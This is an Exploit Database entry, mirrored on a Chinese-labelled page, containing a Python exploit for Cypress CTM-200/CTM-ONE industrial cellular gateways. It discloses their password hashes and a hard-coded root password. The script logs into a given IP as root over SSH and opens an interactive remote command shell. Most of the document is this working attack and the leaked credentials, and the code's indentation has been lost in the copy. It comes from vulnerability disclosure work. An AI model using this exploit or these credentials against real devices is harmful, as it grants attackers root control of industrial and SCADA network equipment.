Cypress Solutions CTM-200/CTM-ONE – Hard-coded Credentials Remote Root (Telnet/SSH)

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2021-10-13
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50407/

• # Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
  # Date: 21.09.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.cypress.bc.ca
  
  #!/usr/bin/env python3
  #
  #
  # Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
  #
  #
  # Vendor: Cypress Solutions Inc.
  # Product web page: https://www.cypress.bc.ca
  # Affected version: CTM-ONE (1.3.6-latest)
  # CTM-ONE (1.3.1)
  # CTM-ONE (1.1.9)
  # CTM200 (2.7.1.5659-latest)
  # CTM200 (2.0.5.3356-184)
  #
  # Summary: CTM-200 is the industrial cellular wireless gateway for fixed
  # and mobile applications. The CTM-200 is a Linux based platform powered
  # by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
  # features make the CTM-200 ideal for mobile fleet applications or fixed
  # site office and SCADA communications.
  #
  # CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
  # fixed applications. CTM-ONE is your next generation of gateway for fleet
  # tracking and fixed sites.
  #
  # ======================================================================
  # CTM-200
  # /var/config/passwd:
  # -------------------
  # root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
  # admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
  # nobody:*:65534:65534:nobody:/var:/bin/false
  # daemon:*:65534:65534:daemon:/var:/bin/false
  #
  # /var/config/advanced.ini:
  # -------------------------
  # 0
  # 0
  # Chameleon
  # 0,0,0,0,0,255
  # 0,0,0,0,0,255
  # 0,0,0,0,0,255
  # 0,0,0,0,0,255
  # 0,0,0,0,0,255
  # 0,0,0,0,0,255
  #
  #
  # CTM-ONE
  # /etc/shadow:
  # ------------
  # admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
  # root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
  # daemon:*:16009:0:99999:7:::
  # bin:*:16009:0:99999:7:::
  # sys:*:16009:0:99999:7:::
  # ftp:*:16009:0:99999:7:::
  # nobody:*:16009:0:99999:7:::
  # messagebus:!:16009:0:99999:7:::
  # ======================================================================
  # 
  # Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
  # within their Linux distribution image. This weakness can lead to the
  # exposure of resources or functionality to unintended actors, providing
  # attackers with sensitive information including executing arbitrary code.
  #
  # Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
  #GNU/Linux 2.6.32.25 (arm4tl)
  #lighttpd/1.4.39
  #BusyBox v1.24.1
  #BusyBox v1.15.3
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # @zeroscience
  #
  #
  # Advisory ID: ZSL-2021-5686
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
  #
  #
  # 21.09.2021
  #
  
  import sys
  import paramiko
  
  bnr='''
  o ┌─┐┌┬┐┌─┐┌─┐┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬┬ o
  │ │││││ ┬├─┤├┬┘│ ││ │ │ └─┐├─┤├┤ ││
  o └─┘┴ ┴└─┘┴ ┴┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
  '''
  print(bnr)
  
  if len(sys.argv)<2:
  print('Put an IP.')
  sys.exit()
  
  adrs=sys.argv[1]##
  unme='root'#admin#
  pwrd='Chameleon'##
  
  rsh=paramiko.SSHClient()
  rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  rsh.connect(adrs,username=unme,password=pwrd)
  
  while 1:
  cmnd=input('# ')
  if cmnd=='exit':
  break
  stdin,stdout,stderr=rsh.exec_command(cmnd)
  stdin.close()
  print(str(stdout.read().decode()))
  rsh.close()